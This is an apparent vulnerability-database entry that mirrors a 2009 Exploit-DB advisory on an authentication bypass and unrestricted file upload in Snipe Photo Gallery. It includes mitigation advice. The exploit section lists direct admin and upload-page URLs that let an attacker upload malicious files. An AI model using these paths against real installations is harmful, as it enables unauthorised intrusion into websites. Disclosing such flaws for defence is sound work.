Snipe Photo Gallery by Pass Remote Upload Vulnerability

vendor:

Snipe Photo Gallery

by:

indoushka

7,5

CVSS

HIGH

Remote Upload

434

CWE

Product Name: Snipe Photo Gallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Lunix Français v.(9.4 Ubuntu)

2009

Snipe Photo Gallery by Pass Remote Upload Vulnerability

An attacker can exploit this vulnerability by accessing the admin area of the Snipe Photo Gallery application and then accessing the upload page. This allows the attacker to upload malicious files to the application.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate file extensions and that the application is configured to only allow the upload of files from trusted sources.

Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Snipe Photo Gallery by Pass Remote Upload Vulnerability           
| # Author   : indoushka                                                                                                              
| # Home     : www.dz-blackhat.com                                                                                                                                                                                                                   
| # Tested on: Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Remote Upload                                                             
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
     1- http://127.0.0.1/snipegallery/admin/index.php (Admin Aera)
     
     2- http://127.0.0.1/snipegallery/admin/index.php?action=add&cat_id=3 (Upload Page)
     
                    
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------